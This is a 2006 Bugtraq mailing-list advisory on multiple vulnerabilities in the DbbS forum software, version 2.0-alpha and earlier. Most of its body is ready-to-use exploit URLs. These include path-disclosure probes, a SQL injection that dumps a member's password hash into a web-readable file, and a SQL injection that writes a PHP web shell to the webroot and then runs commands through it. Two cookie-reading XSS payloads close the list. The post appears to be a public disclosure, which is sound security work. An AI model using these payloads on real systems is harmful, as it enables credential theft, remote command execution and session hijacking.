DbbS<=2.0-alpha Multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DbbS<=2.0-alpha Multiple Vulnerabilities
From: yamcho@xxxxxxx
Date: 16 Apr 2006 03:46:38 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=

MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/*

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/*

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir

XSS

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation=";><script>alert(document.cookie)</script>

http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies=";><script>alert(document.cookie)</script>


by rgod and yamcho

Prev by Date: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
Next by Date: Re: [KAPDA]CopperminePhotoGallery1.4.4~ PluginInclusionSystem(index.php)~ RemoteFileInclusion attack
Previous by thread: Re: Snipe Gallery <= 3.1.4 Multiple XSS
Next by thread: Xss In bMachine 2٫7
Index(es):
- Date
- Thread